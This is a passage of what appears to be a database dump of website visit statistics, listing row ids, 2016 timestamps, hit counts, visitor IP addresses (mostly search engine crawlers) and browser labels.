69.93',''),(28105,1459212261,3,2,1,0,'66.249.69.77',''),(28106,1459212568,2,2,0,0,'130.193.50.34','other'),(28107,1459212745,1,1,0,0,'217.69.133.229','other'),(28108,1459212782,3,1,2,0,'66.249.69.85',''),(28109,1459212892,1,1,0,0,'66.249.91.37','other'),(28110,1459212964,1,1,0,0,'144.76.4.148','other'),(28111,1459213096,1,1,0,0,'93.158.152.203','other'),(28112,1459213100,1,1,0,0,'37.9.122.203','other'),(28113,1459213130,2,1,1,0,'66.249.69.93',''),(28114,1459213171,1,1,0,0,'93.158.152.202','other'),(28115,1459213178,3,3,0,0,'178.154.189.202','other'),(28116,1459213517,1,1,0,0,'217.69.133.239','other'),(28117,1459213535,1,1,0,0,'217.69.133.226','other'),(28119,1459213536,1,1,0,0,'217.69.133.222','other'),(28121,1459213841,1,1,0,0,'217.69.133.85','other'),(28122,1459213871,2,0,2,0,'66.249.69.77',''),(28123,1459214169,1,0,1,0,'68.180.231.29',''),(28124,1459214334,1,1,0,0,'217.69.133.233','other'),(28125,1459214839,1,1,0,0,'217.69.133.224','other'),(28126,1459215188,1,0,1,0,'66.249.69.93',''),(28127,1459215278,1,1,0,0,'8.29.198.25','other'),(28128,1459215658,1,0,1,0,'66.249.69.77',''),(28129,1459215921,2,0,2,0,'68.180.231.29',''),(28130,1459216255,1,1,0,0,'217.69.133.220','other'),(28132,1459216435,3,1,2,0,'66.249.69.85',''),(28133,1459216641,1,0,1,0,'66.249.69.93',''),(28134,1459217174,1,1,0,0,'180.76.15.134','other'),(28135,1459217356,2,2,0,0,'217.69.133.233','other'),(28136,1459217358,1,1,0,0,'217.69.133.231','other'),(28137,1459217438,1,1,0,0,'217.69.133.194','other'),(28138,1459217723,1,1,0,0,'66.249.69.85','other'),(28139,1459217809,1,1,0,0,'217.69.133.239','other'),(28140,1459217894,1,1,0,0,'217.69.133.67','other'),(28141,1459218135,1,1,0,0,'217.69.133.220','other'),(28142,1459218269,1,1,0,0,'40.77.167.0','other'),(28143,1459218347,3,3,0,0,'46.165.197.142','other'),(28144,1459218941,1,1,0,0,'217.69.133.235','other'),(28146,1459218942,1,1,0,0,'217.69.133.237','other'),(28147,1459219105,1,1,0,0,'217.69.133.215','other'),(28148,1459219219,132,132,0,0,'149.202.48.192','other'),(28149,1459219307,1,1,0,0,'217.69.133.226','other'),(28150,1459219757,1,0,1,0,'68.180.231.29',''),(28151,1459219878,2,0,2,0,'66.249.69.85',''),(28152,1459219995,1,1,0,0,'66.249.69.93','other'),(28153,1459220891,2,2,0,0,'66.249.69.77','other'),(28154,1459220920,1,1,0,0,'66.249.69.85','other'),(28155,1459220955,1,1,0,0,'62.210.215.100','chrome'),(28156,1459222155,2,2,0,0,'66.249.69.77','other'),(28157,1459222212,1,1,0,0,'66.249.69.93','other'),(28158,1459222382,3,3,0,0,'69.30.210.242','other'),(28159,1459222614,1,1,0,0,'94.23.19.178','other'),(28160,1459223155,1,1,0,0,'40.77.167.0','other'),(28161,1459223159,1,0,1,0,'66.249.69.77',''),(28162,1459223276,1,1,0,0,'180.76.15.146','other'),(28163,1459223317,1,1,0,0,'217.69.133.217','other'),(28164,1459223354,1,1,0,0,'217.69.133.225','other'),(28165,1459223609,1,0,1,0,'68.180.231.29',''),(28166,1459223774,1,1,0,0,'217.69.133.223','other'),(28168,1459223811,1,1,0,0,'66.249.91.41','other'),(28169,1459224414,1,1,0,0,'217.69.133.219','other'),(28170,1459224432,2,0,2,0,'66.249.69.93',''),(28171,1459225018,1,1,0,0,'217.69.133.239','other'),(28172,1459225677,1,1,0,0,'66.249.69.93','other'),(28173,1459226012,1,1,0,0,'178.154.149.11','other'),(28174,1459226016,1,1,0,0,'178.154.189.31','other'),(28175,1459226124,1,1,0,0,'8.29.198.25','other'),(28176,1459227034,1,1,0,0,'66.249.69.93','other'),(28177,1459227506,1,1,0,0,'217.69.136.207','other'),(28178,1459227507,1,1,0,0,'217.69.136.205','other'),(28179,1459227508,1,1,0,0,'217.69.136.206','other'),(28180,1459227603,1,0,1,0,'66.249.69.77',''),(28181,1459227726,1,1,0,0,'217.69.133.226','other'),(28182,1459228563,2,2,0,0,'141.8.183.25','other'),(28183,1459228616,1,0,1,0,'66.249.69.77',''),(28184,1459228650,2,1,1,0,'66.249.69.77',''),(28185,1459228679,1,1,0,0,'217.69.133.240','other'),(28186,1459228680,1,1,0,0,'217.69.133.70','other'),(28187,1459228767,2,2,0,0,'88.198.230.79','other'),(28188,1459228781,1,1,0,0,'5.255.253.67','other'),(28189,1459229008,1,1,0,0,'130.193.51.19','other'),(28190,1459229194,1,1,0,0,'130.193.51.14','other'),(28191,1459229213,1,1,0,0,'40.77.167.26','other'),(28192,1459229247,1,1,0,0,'217.69.133.229','other'),(28193,1459229292,16,16,0,0,'130.193.50.34','other'),(28194,1459229296,8,8,0,0,'5.255.253.113','other'),(28195,1459229300,8,8,0,0,'141.8.132.105','other'),(28196,1459229691,1,1,0,0,'66.249.93.104','chrome'),(28197,1459229805,1,1,0,0,'141.8.142.85','other'),(28198,1459229809,1,1,0,0,'5.255.253.67','other'),(28199,1459229813,6,6,0,0,'141.8.183.25','other'),(28200,1459229817,1,1,0,0,'141.8.142.61','other'),(28201,1459229821,1,1,0,0,'141.8.142.25','other'),(28202,1459229826,1,1,0,0,'130.193.50.6','other'),(28203,1459229830,1,1,0,0,'141.8.142.62','other'),(28204,1459230066,1,1,0,0,'217.69.133.233','other'),(28205,1459230372,1,1,0,0,'130.193.50.34','other'),(28206,1459230376,4,4,0,0,'141.8.132.105','other'),(28207,1459230508,1,1,0,0,'91.196.178.65','chrome'),(28208,1459230527,1,0,1,0,'66.249.69.77',''),(28209,1459230657,2,0,2,0,'68.180.231.29',''),(28210,1459231386,1,1,0,0,'93.158.152.61','other'),(28211,1459231450,1,1,0,0,'217.69.133.30','other'),(28212,1459231635,1,1,0,0,'130.193.50.34','other'),(28213,1459231836,1,1,0,0,'40.77.167.0','other'),(28214,1459231979,2,2,0,0,'82.207.98.199','firefox'),(28215,1459232011,1,1,0,0,'5.255.253.113','other'),(28216,1459232133,2,2,0,0,'91.196.178.68','firefox'),(28217,1459232136,1,1,0,0,'91.196.178.68','chrome'),(28218,1459232176,3,3,0,0,'141.8.132.105','other'),(28219,1459232557,3,3,0,0,'130.193.50.34','other'),(28220,1459232685,1,1,0,0,'178.94.251.66','chrome'),(28221,1459232697,1,1,0,0,'141.8.142.67','other'),(28222,1459232701,1,1,0,0,'130.193.51.83','other'),(28223,1459232706,1,1,0,0,'141.8.142.61','other'),(28224,1459232707,1,0,1,0,'68.180.231.29',''),(28225,1459232726,1,1,0,0,'46.211.2.37','other'),(28226,1459232789,1,1,0,0,'217.77.210.162','firefox'),(28227,1459232791,5,5,0,0,'174.34.135.242','other'),(28228,1459232889,2,2,0,0,'217.69.133.216','other'),(28229,1459233027,1,1,0,0,'178.154.189.202','other'),(28230,1459233096,1,1,0,0,'217.69.133.223','other'),(28231,1459233164,1,1,0,0,'141.8.132.105','other'),(28232,1459233196,1,1,0,0,'91.196.178.166','firefox'),(28233,1459233228,1,1,0,0,'178.154.189.203','other'),(28234,1459233244,2,2,0,0,'217.69.133.222','other'),(28235,1459233261,1,0,1,0,'66.249.69.93',''),(28236,1459233523,1,1,0,0,'91.196.178.66','firefox'),(28237,1459233554,1,0,1,0,'66.249.69.85',''),(28238,1459233585,1,1,0,0,'91.196.178.134','firefox'),(28239,1459233613,4,4,0,0,'130.193.51.83','other'),(28240,1459233861,2,2,0,0,'141.8.142.67','other'),(28241,1459233865,6,6,0,0,'130.193.50.34','other'),(28242,1459233933,1,1,0,0,'91.196.178.97','chrome'),(28243,1459233986,1,1,0,0,'217.69.133.216','other'),(28244,1459233987,1,1,0,0,'217.69.133.215','other'),(28245,1459234179,1,1,0,0,'91.196.178.69','chrome'),(28246,1459234203,4,4,0,0,'141.8.183.25','other'),(28247,1459234215,1,1,0,0,'141.8.142.61','other'),(28248,1459234218,1,1,0,0,'141.8.142.58','other'),(28249,1459234223,2,2,0,0,'5.255.253.113','other'),(28250,1459234298,2,2,0,0,'141.8.132.105','other'),(28251,1459234479,1,0,1,0,'66.249.69.85',''),(28252,1459234586,1,0,1,0,'66.249.69.93',''),(28253,1459234818,1,1,0,0,'93.73.234.193','firefox'),(28254,1459234851,1,1,0,0,'66.249.91.45','other'),(28255,1459234945,1,1,0,0,'94.179.46.245','chrome'),(28256,1459234953,1,0,1,0,'66.249.69.162',''),(28257,1459234986,2,2,0,0,'130.193.50.34','other'),(28258,1459235019,1,1,0,0,'95.27.20.153','firefox'),(28259,1459235238,1,1,0,0,'217.69.133.231','other'),(28260,1459235270,1,1,0,0,'5.255.253.113','other'),(28261,1459235274,1,1,0,0,'141.8.132.105','other'),(28262,1459235443,1,0,1,0,'66.249.69.150',''),(28263,1459235769,1,1,0,0,'217.69.133.84','other'),(28264,1459235837,2,0,2,0,'66.249.69.85',''),(28265,1459235941,1,1,0,0,'130.193.51.83','other'),(28266,1459236085,1,1,0,0,'217.69.133.224','other'),(28267,1459236189,1,1,0,0,'91.196.178.167','firefox'),(28268,1459236430,1,1,0,0,'141.8.142.58','other'),(28269,1459236434,2,2,0,0,'5.255.253.113','other'),(28270,1459236548,1,1,0,0,'217.69.133.68','other'),(28271,1459236592,1,0,1,0,'68.180.231.29',''),(28272,1459236606,1,1,0,0,'217.69.133.219','other'),(28273,1459236617,1,1,0,0,'62.210.215.100','chrome'),(28274,1459236644,1,1,0,0,'91.196.178.67','chrome'),(28275,1459236944,3,0,3,0,'66.249.69.85',''),(28276,1459236948,1,1,0,0,'8.29.198.26','other'),(28277,1459237011,3,0,3,0,'66.249.69.77',''),(28278,1459237066,2,2,0,0,'141.8.132.105','other'),(28279,1459237470,1,1,0,0,'130.193.50.201','other'),(28280,1459237614,4,4,0,0,'130.193.50.34','other'),(28281,1459237624,1,1,0,0,'91.196.178.68','firefox'),(28282,1459237860,1,1,0,0,'66.249.69.85','other'),(28283,1459238021,1,1,0,0,'180.76.15.140','other'),(28284,1459238494,1,1,0,0,'46.252.212.99','chrome'),(28285,1459238577,1,1,0,0,'217.69.133.248','other'),(28286,1459238745,2,2,0,0,'37.53.76.152','chrome'),(28287,1459238825,1,0,1,0,'66.249.69.162',''),(28288,1459238842,1,0,1,0,'66.249.69.156',''),(28289,1459238904,1,0,1,0,'66.249.69.77',''),(28290,1459239001,1,1,0,0,'217.69.133.29','other'),(28291,1459239002,1,1,0,0,'217.69.133.59','other'),(28292,1459239003,1,1,0,0,'217.69.133.60','other'),(28293,1459239010,2,2,0,0,'91.196.178.70','firefox'),(28294,1459239092,1,1,0,0,'130.193.51.83','other'),(28295,1459239096,2,2,0,0,'141.8.183.25','other'),(28296,1459239273,1,1,0,0,'91.196.178.102','firefox'),(28297,1459239297,2,2,0,0,'130.193.50.34','other'),(28298,1459239301,1,1,0,0,'5.255.253.113','other'),(28299,1459239316,3,3,0,0,'141.8.132.105','other'),(28300,1459239698,1,1,0,0,'213.179.252.213','chrome'),(28301,1459240029,1,1,0,0,'180.76.15.26','other'),(28302,1459240057,2,2,0,0,'91.196.178.70','firefox'),(28303,1459240119,1,1,0,0,'91.196.178.166','firefox'),(28304,1459240229,1,1,0,0,'91.196.178.68','firefox'),(28305,1459240363,1,1,0,0,'178.154.148.116','other'),(28306,1459240408,1,1,0,0,'37.53.110.196','other'),(28307,1459240425,1,1,0,0,'141.8.142.61','other'),(28308,1459240566,7,7,0,0,'66.249.69.77','other'),(28309,1459240632,1,1,0,0,'91.213.33.104','chrome'),(28310,1459240873,1,1,0,0,'40.77.167.26','other'),(28311,1459241076,1,1,0,0,'66.249.69.85','other'),(28312,1459241203,1,1,0,0,'91.196.178.70','firefox'),(28313,1459241238,1,1,0,0,'217.69.133.227','other'),(28314,1459241370,1,1,0,0,'91.196.178.66','firefox'),(28315,1459241431,1,1,0,0,'130.193.51.83','other'),(28316,1459241434,1,1,0,0,'141.8.132.105','other'),(28317,1459241456,1,1,0,0,'217.69.133.225','other'),(28318,1459241462,1,0,1,0,'68.180.231.29',''),(28319,1459241514,1,1,0,0,'66.249.69.150','other'),(28320,1459241874,3,0,3,0,'66.249.69.77',''),(28321,1459241913,1,1,0,0,'217.69.133.220','other'),(28322,1459242101,2,0,2,0,'66.249.69.85',''),(28323,1459242122,1,1,0,0,'91.196.178.68','firefox'),(28324,1459242251,1,1,0,0,'40.77.167.0','other'),(28325,1459242338,1,1,0,0,'130.193.50.34','other'),(28326,1459242504,1,1,0,0,'92.113.159.119','chrome'),(28327,1459242506,2,2,0,0,'66.249.69.156','other'),(28328,1459242672,1,1,0,0,'130.180.212.241','chrome'),(28329,1459242834,1,1,0,0,'217.69.133.232','other'),(28331,1459242873,1,1,0,0,'91.196.178.70','chrome'),(28332,1459242979,1,1,0,0,'91.196.178.134','firefox'),(28333,1459243410,1,1,0,0,'141.8.132.105','other'),(28334,1459243414,1,1,0,0,'66.249.69.156','other'),(28335,1459243727,8,0,8,0,'66.249.69.77',''),(28336,1459243865,1,1,0,0,'66.249.69.162','other'),(28337,1459243971,1,1,0,0,'157.55.39.219','other'),(28338,1459244110,1,1,0,0,'91.196.178.66','chrome'),(28339,1459244383,1,1,0,0,'130.193.50.34','other'),(28340,1459244437,1,0,1,0,'66.249.69.93',''),(28341,1459244441,1,0,1,0,'66.249.69.85',''),(28342,1459244528,1,1,0,0,'46.201.241.5','firefox'),(28343,1459244652,7,0,7,0,'66.249.69.77',''),(28344,1459244959,1,1,0,0,'217.69.133.3','other'),(28345,1459245232,1,0,1,0,'66.249.69.162',''),(28346,1459245464,2,0,2,0,'66.249.69.93',''),(28347,1459245647,1,0,1,0,'66.249.69.77',''),(28348,1459245657,1,1,0,0,'217.69.133.69','other'),(28349,1459245670,1,0,1,0,'66.249.69.85',''),(28350,1459245752,1,1,0,0,'217.69.133.225','other'),(28351,1459245816,1,1,0,0,'130.193.51.19','other'),(28352,1459245861,1,1,0,0,'66.249.91.37','other'),(28353,1459245917,1,1,0,0,'91.196.178.68','firefox'),(28354,1459245964,1,1,0,0,'130.193.50.201','other'),(28355,1459245980,1,1,0,0,'217.69.133.235','other'),(28356,1459246571,1,0,1,0,'66.249.69.93',''),(28357,1459246591,12,0,12,0,'66.249.69.77',''),(28358,1459246688,2,2,0,0,'217.69.133.229','other'),(28359,1459246689,1,1,0,0,'217.69.133.231','other'),(28361,1459246690,1,1,0,0,'217.69.133.233','other'),(28362,1459246713,1,1,0,0,'66.249.69.162','other'),(28363,1459246960,1,1,0,0,'217.69.133.234','other'),(28364,1459247003,1,1,0,0,'217.69.133.249','other'),(28365,1459247141,1,0,1,0,'68.180.231.29',''),(28366,1459247213,1,1,0,0,'130.193.50.34','other'),(28367,1459247217,1,1,0,0,'141.8.132.105','other'),(28368,1459247289,1,1,0,0,'91.196.178.169','chrome'),(28369,1459247490,2,1,1,0,'66.249.69.93',''),(28370,1459247586,7,6,1,0,'66.249.69.77',''),(28371,1459247598,3,2,1,0,'66.249.69.85',''),(28372,1459247784,1,1,0,0,'8.29.198.26','other'),(28373,1459247788,1,1,0,0,'217.69.133.220','other'),(28374,1459248290,1,1,0,0,'91.196.178.169','chrome'),(28375,1459248316,1,1,0,0,'178.154.189.202','other'),(28376,1459248386,1,1,0,0,'157.55.39.165','other'),(28377,1459248529,1,1,0,0,'164.132.161.97','other'),(28378,1459248625,1,1,0,0,'217.69.133.15','other'),(28379,1459248728,1,1,0,0,'94.178.146.174','opera'),(28380,1459248885,1,1,0,0,'130.193.50.34','other'),(28381,1459248889,1,1,0,0,'141.8.183.25','other'),(28382,1459249042,1,0,1,0,'66.249.69.77',''),(28383,1459249095,2,0,2,0,'66.249.69.85',''),(28384,1459249485,2,2,0,0,'66.249.69.85','other'),(28385,1459249684,1,1,0,0,'217.69.133.220','other'),(28386,1459249772,1,1,0,0,'217.69.133.238','other'),(28387,1459249850,1,0,1,0,'66.249.69.150',''),(28388,1459249861,1,0,1,0,'68.180.231.29',''),(28389,1459249884,5,5,0,0,'91.121.221.15','other'),(28391,1459249891,1,1,0,0,'93.171.243.145','chrome'),(28392,1459250568,2,2,0,0,'66.249.69.93','other'),(28393,1459250602,1,1,0,0,'5.255.253.113','other'),(28394,1459250604,3,1,2,0,'66.249.69.77',''),(28395,1459250606,1,1,0,0,'141.8.142.58','other'),(28396,1459250728,1,1,0,0,'40.77.167.0','other'),(28397,1459250747,3,2,1,0,'66.249.69.85',''),(28398,1459250874,1,0,1,0,'68.180.231.29',''),(28399,1459251121,1,1,0,0,'217.69.133.230','other'),(28400,1459251312,1,1,0,0,'130.180.212.241','chrome'),(28401,1459251480,1,1,0,0,'92.113.217.179','chrome'),(28402,1459251491,1,0,1,0,'66.249.69.93',''),(28403,1459251516,3,3,0,0,'178.203.146.227','other'),(28404,1459251551,9,0,9,0,'66.249.69.77',''),(28405,1459251666,1,1,0,0,'141.0.14.211','other'),(28406,1459251690,6,1,5,0,'66.249.69.77',''),(28407,1459251779,1,0,1,0,'66.249.69.150',''),(28408,1459251861,1,1,0,0,'217.69.133.228','other'),(28409,1459251878,1,1,0,0,'164.132.161.61','other'),(28410,1459251902,1,1,0,0,'91.196.178.66','firefox'),(28411,1459252067,1,1,0,0,'46.201.240.112','firefox'),(28412,1459252072,1,1,0,0,'91.196.178.66','chrome'),(28413,1459252164,3,2,1,0,'66.249.69.93',''),(28414,1459252335,1,1,0,0,'66.249.69.85','other'),(28415,1459252588,1,1,0,0,'130.193.50.34','other'),(28416,1459252614,1,1,0,0,'51.255.65.44','other'),(28417,1459252615,1,0,1,0,'66.249.69.77',''),(28418,1459252646,1,1,0,0,'217.69.133.252','other'),(28419,1459252647,1,1,0,0,'217.69.133.250','other'),(28420,1459253172,1,1,0,0,'94.179.119.73','firefox'),(28421,1459253630,2,0,2,0,'66.249.69.85',''),(28422,1459253656,3,0,3,0,'66.249.69.77',''),(28423,1459253670,1,0,1,0,'66.249.69.156',''),(28424,1459253962,1,1,0,0,'37.54.172.147','chrome'),(28425,1459253992,1,1,0,0,'217.69.133.243','other'),(28426,1459253994,1,1,0,0,'217.69.133.245','other'),(28427,1459253995,1,1,0,0,'217.69.133.244','other'),(28428,1459254476,2,1,1,0,'66.249.69.77',''),(28429,1459254648,1,1,0,0,'83.143.240.10','chrome'),(28430,1459254674,1,1,0,0,'130.193.51.19','other'),(28431,1459254678,2,2,0,0,'5.255.253.113','other'),(28432,1459254816,1,1,0,0,'95.213.6.53','other'),(28433,1459254817,1,1,0,0,'217.69.136.58','chrome'),(28434,1459254824,1,1,0,0,'130.180.212.241','chrome'),(28435,1459255110,1,1,0,0,'62.210.215.100','chrome'),(28436,1459255113,1,1,0,0,'5.39.1.54','chrome'),(28437,1459255146,1,0,1,0,'66.249.69.85',''),(28438,1459255157,1,0,1,0,'68.180.231.29',''),(28439,1459255204,1,1,0,0,'91.196.178.162','chrome'),(28440,1459255226,1,1,0,0,'51.255.65.4','other'),(28441,1459255368,6,6,0,0,'141.8.183.25','other'),(28442,1459255374,4,4,0,0,'141.8.132.105','other'),(28443,1459255378,4,4,0,0,'130.193.50.34','other'),(28444,1459255527,1,1,0,0,'217.69.133.221','other'),(28445,1459255711,1,1,0,0,'217.69.133.230','other'),(28446,1459255713,1,1,0,0,'217.69.133.233','other'),(28447,1459255774,1,1,0,0,'91.196.178.68','firefox'),(28448,1459255904,1,1,0,0,'46.200.159.97','chrome'),(28449,1459256097,2,0,2,0,'66.249.69.85',''),(28450,1459256257,1,1,0,0,'130.193.51.83','other'),(28451,1459256327,1,1,0,0,'217.69.133.217','other'),(28452,1459256329,1,1,0,0,'217.69.133.218','other'),(28453,1459256703,1,0,1,0,'66.249.69.93',''),(28454,1459256711,1,1,0,0,'66.249.91.37','other'),(28455,1459256722,2,2,0,0,'141.8.132.105','other'),(28456,1459256751,2,2,0,0,'217.69.133.224','other'),(28457,1459256892,2,0,2,0,'66.249.69.150',''),(28458,1459256905,11,0,11,0,'66.249.69.77',''),(28459,1459256925,1,1,0,0,'217.69.133.232','other'),(28460,1459257097,1,0,1,0,'66.249.69.156',''),(28461,1459257669,2,2,0,0,'5.255.253.47','other'),(28462,1459257670,1,1,0,0,'93.158.152.26','other'),(28463,1459257672,1,1,0,0,'141.8.142.25','other'),(28464,1459257681,1,1,0,0,'178.154.149.10','other'),(28465,1459257687,1,1,0,0,'141.8.132.83','other'),(28466,1459257713,1,1,0,0,'194.44.173.126','chrome'),(28467,1459257757,1,0,1,0,'66.249.69.93',''),(28468,1459257859,1,0,1,0,'66.249.69.77',''),(28469,1459257934,2,0,2,0,'68.180.231.29',''),(28470,1459258136,1,1,0,0,'51.255.65.29','other'),(28471,1459258237,2,1,1,0,'66.249.69.77',''),(28472,1459258265,2,0,2,0,'66.249.69.85',''),(28473,1459258323,1,1,0,0,'164.132.161.55','other'),(28474,1459258339,7,7,0,0,'141.8.183.25','other'),(28475,1459258347,4,4,0,0,'5.255.253.113','other'),(28476,1459258355,1,1,0,0,'51.255.65.76','other'),(28477,1459258359,1,1,0,0,'130.193.51.83','other'),(28478,1459258360,22,22,0,0,'130.193.50.34','other'),(28479,1459258367,1,1,0,0,'217.69.133.223','other'),(28481,1459258376,2,1,1,0,'66.249.69.93',''),(28482,1459258393,1,1,0,0,'130.193.51.19','other'),(28483,1459258771,1,1,0,0,'180.76.15.19','other'),(28484,1459258800,1,1,0,0,'180.76.15.144','other'),(28485,1459258841,17,17,0,0,'141.8.132.105','other'),(28486,1459258897,1,0,1,0,'68.180.231.29',''),(28487,1459258913,1,1,0,0,'8.29.198.25','other'),(28488,1459259110,1,1,0,0,'217.69.133.85','other'),(28489,1459259177,3,0,3,0,'66.249.69.85',''),(28490,1459259240,1,1,0,0,'94.179.119.73','firefox'),(28491,1459259277,1,1,0,0,'164.132.161.70','other'),(28492,1459259303,1,1,0,0,'91.196.178.70','firefox'),(28493,1459259606,3,1,2,0,'66.249.69.93',''),(28494,1459259687,1,1,0,0,'91.196.178.71','firefox'),(28495,1459259713,6,0,6,0,'66.249.69.77',''),(28496,1459259738,1,0,1,0,'66.249.69.150',''),(28497,1459260133,1,1,0,0,'217.69.133.237','other'),(28498,1459260174,2,0,2,0,'66.249.69.85',''),(28499,1459260179,1,0,1,0,'66.249.69.156',''),(28500,1459260422,1,1,0,0,'217.69.133.215','other'),(28501,1459260666,1,0,1,0,'66.249.69.93',''),(28502,1459261461,1,1,0,0,'217.69.133.231','other'),(28503,1459261541,3,1,2,0,'66.249.69.85',''),(28504,1459261654,1,1,0,0,'37.52.23.53','chrome'),(28505,1459261672,1,1,0,0,'91.196.178.98','opera'),(28506,1459261692,1,1,0,0,'217.69.133.232','other'),(28507,1459261851,1,1,0,0,'66.249.69.150','other'),(28508,1459261862,1,1,0,0,'66.249.69.162','other'),(28509,1459261918,1,0,1,0,'66.249.69.77',''),(28510,1459262091,1,1,0,0,'217.69.133.215','other'),(28511,1459262092,1,1,0,0,'217.69.133.219','other'),(28512,1459263025,1,1,0,0,'51.255.65.66','other'),(28513,1459263053,1,1,0,0,'82.207.91.234','firefox'),(28514,1459263118,1,1,0,0,'37.52.23.53','chrome'),(28515,1459263121,1,1,0,0,'164.132.161.26','other'),(28516,1459263151,1,0,1,0,'66.249.69.93',''),(28517,1459263372,1,0,1,0,'66.249.69.156',''),(28518,1459263633,1,1,0,0,'8.37.235.233','other'),(28519,1459263669,1,1,0,0,'91.196.178.162','chrome'),(28520,1459263750,1,1,0,0,'217.69.133.250','other'),(28521,1459263827,2,1,1,0,'66.249.69.85',''),(28522,1459264032,1,1,0,0,'37.52.23.53','chrome'),(28523,1459264131,1,1,0,0,'217.69.133.242','other'),(28524,1459264132,1,1,0,0,'217.69.133.243','other'),(28525,1459264217,1,1,0,0,'66.249.69.93','other'),(28526,1459264379,1,0,1,0,'68.180.231.29',''),(28527,1459264576,1,1,0,0,'94.179.110.73','firefox'),(28528,1459264835,2,0,2,0,'66.249.69.85',''),(28529,1459265134,1,1,0,0,'130.180.212.241','chrome'),(28530,1459265543,1,1,0,0,'217.69.136.205','other'),(28531,1459265993,3,0,3,0,'68.180.231.29',''),(28532,1459266157,1,1,0,0,'185.46.149.83','chrome'),(28533,1459266486,1,1,0,0,'151.80.31.178','other'),(28534,1459266710,4,0,4,0,'66.249.69.85',''),(28535,1459266734,13,0,13,0,'66.249.69.77',''),(28536,1459266760,1,0,1,0,'66.249.69.150',''),(28537,1459266818,1,1,0,0,'217.69.133.69','other'),(28538,1459267007,1,1,0,0,'164.132.161.10','other'),(28539,1459267610,1,1,0,0,'157.55.39.165','other'),(28540,1459267618,3,2,1,0,'66.249.69.85',''),(28541,1459267717,1,1,0,0,'95.133.238.67','chrome'),(28542,1459267728,2,0,2,0,'68.180.231.29',''),(28543,1459267881,1,1,0,0,'66.249.91.41','other'),(28544,1459267980,1,1,0,0,'217.69.133.224','other'),(28545,1459267981,1,1,0,0,'217.69.133.220','other'),(28546,1459268450,1,0,1,0,'66.249.69.93',''),(28547,1459268549,1,0,1,0,'66.249.69.85',''),(28548,1459268551,1,1,0,0,'217.69.133.251','other'),(28549,1459268552,1,1,0,0,'217.69.133.252','other'),(28550,1459268945,3,0,3,0,'66.249.69.77',''),(28551,1459268971,1,1,0,0,'217.69.133.227','other'),(28552,1459269037,1,1,0,0,'40.77.167.0','other'),(28553,1459269210,1,1,0,0,'164.132.161.83','other'),(28554,1459269360,1,1,0,0,'178.154.189.203','other'),(28555,1459269390,1,1,0,0,'164.132.161.93','other'),(28556,1459269454,1,1,0,0,'217.69.133.225','other'),(28557,1459269496,1,0,1,0,'66.249.69.85',''),(28558,1459269631,2,0,2,0,'68.180.231.29',''),(28559,1459269787,1,1,0,0,'8.29.198.25','other'),(28560,1459269952,3,0,3,0,'66.249.69.77',''),(28561,1459270536,1,1,0,0,'164.132.161.69','other'),(28562,1459270802,1,1,0,0,'217.69.133.85','other'),(28563,1459271169,1,1,0,0,'157.55.39.165','other'),(28564,1459271439,1,1,0,0,'164.132.161.97','other'),(28565,1459271486,1,1,0,0,'217.69.136.207','other'),(28566,1459271487,1,1,0,0,'217.69.136.208','other'),(28567,1459271488,1,1,0,0,'217.69.136.203','other'),(28568,1459271616,1,1,0,0,'217.69.133.67','other'),(28569,1459272092,1,0,1,0,'66.249.69.93',''),(28570,1459272122,1,0,1,0,'66.249.69.85',''),(28571,1459272237,1,1,0,0,'217.69.133.193','other'),(28572,1459272625,1,1,0,0,'62.210.215.100','chrome'),(28573,1459272774,1,1,0,0,'66.249.69.150','other'),(28574,1459272796,1,1,0,0,'66.249.69.93','other'),(28575,1459272807,3,2,1,0,'66.249.69.85',''),(28576,1459272819,6,5,1,0,'66.249.69.77',''),(28577,1459272836,1,1,0,0,'164.132.161.56','other'),(28578,1459273443,1,1,0,0,'164.132.161.20','other'),(28579,1459273756,1,0,1,0,'66.249.69.77',''),(28580,1459273763,1,1,0,0,'51.255.65.68','other'),(28581,1459273841,1,1,0,0,'62.210.215.100','chrome'),(28582,1459273856,1,1,0,0,'91.196.178.68','chrome'),(28583,1459273934,1,1,0,0,'217.69.133.84','other'),(28584,1459274510,1,1,0,0,'51.255.65.31','other'),(28585,1459274667,1,1,0,0,'95.135.91.48','firefox'),(28586,1459275491,1,1,0,0,'217.69.136.206','other'),(28587,1459275671,1,1,0,0,'51.255.65.58','other'),(28588,1459275690,1,0,1,0,'66.249.69.85',''),(28589,1459275796,1,1,0,0,'66.249.69.77','other'),(28590,1459275852,1,0,1,0,'68.180.231.29',''),(28591,1459275939,1,1,0,0,'37.19.212.153','chrome'),(28592,1459276578,3,3,0,0,'157.55.39.165','other'),(28593,1459276645,1,0,1,0,'40.77.167.35',''),(28594,1459276774,1,1,0,0,'130.180.208.65','chrome'),(28595,1459276958,1,0,1,0,'66.249.69.150',''),(28596,1459277367,1,0,1,0,'66.249.69.85',''),(28597,1459277409,1,0,1,0,'66.249.69.77',''),(28598,1459277961,1,1,0,0,'164.132.161.45','other'),(28599,1459278233,1,1,0,0,'66.249.91.37','other'),(28601,1459278267,1,0,1,0,'66.249.69.93',''),(28602,1459278428,1,1,0,0,'217.69.133.192','other'),(28603,1459278452,1,0,1,0,'66.249.69.77',''),(28604,1459278709,231,231,0,0,'51.254.97.219','other'),(28605,1459278936,1,1,0,0,'217.69.133.232','other'),(28606,1459278947,1,1,0,0,'217.69.133.216','other'),(28607,1459278978,1,0,1,0,'66.249.69.85',''),(28608,1459279039,1,1,0,0,'66.249.69.162','other'),(28609,1459279252,1,0,1,0,'66.249.69.150',''),(28610,1459279314,1,1,0,0,'164.132.161.86','other'),(28611,1459279342,1,1,0,0,'217.69.133.222','other'),(28612,1459279613,49,49,0,0,'51.254.97.219','other'),(28613,1459279733,1,0,1,0,'68.180.231.29',''),(28614,1459279806,1,1,0,0,'51.255.65.25','other'),(28615,1459280025,1,1,0,0,'217.69.133.12','other'),(28616,1459280104,1,0,1,0,'66.249.69.93',''),(28617,1459280179,1,1,0,0,'37.53.110.21','chrome'),(28618,1459280188,1,1,0,0,'66.102.9.57','chrome'),(28619,1459280632,1,1,0,0,'8.29.198.26','other'),(28620,1459280876,2,2,0,0,'217.69.133.21','other'),(28621,1459280877,1,1,0,0,'217.69.133.250','other'),(28622,1459280895,1,0,1,0,'66.249.69.77',''),(28623,1459280952,1,1,0,0,'217.69.133.232','other'),(28625,1459280953,1,1,0,0,'217.69.133.230','other'),(28627,1459281015,1,1,0,0,'151.80.31.167','other'),(28628,1459281093,1,0,1,0,'66.249.69.93',''),(28629,1459281118,1,1,0,0,'195.58.251.34','firefox'),(28630,1459281265,1,1,0,0,'164.132.161.35','other'),(28631,1459281316,1,1,0,0,'217.69.133.242','other'),(28632,1459281317,1,1,0,0,'217.69.133.243','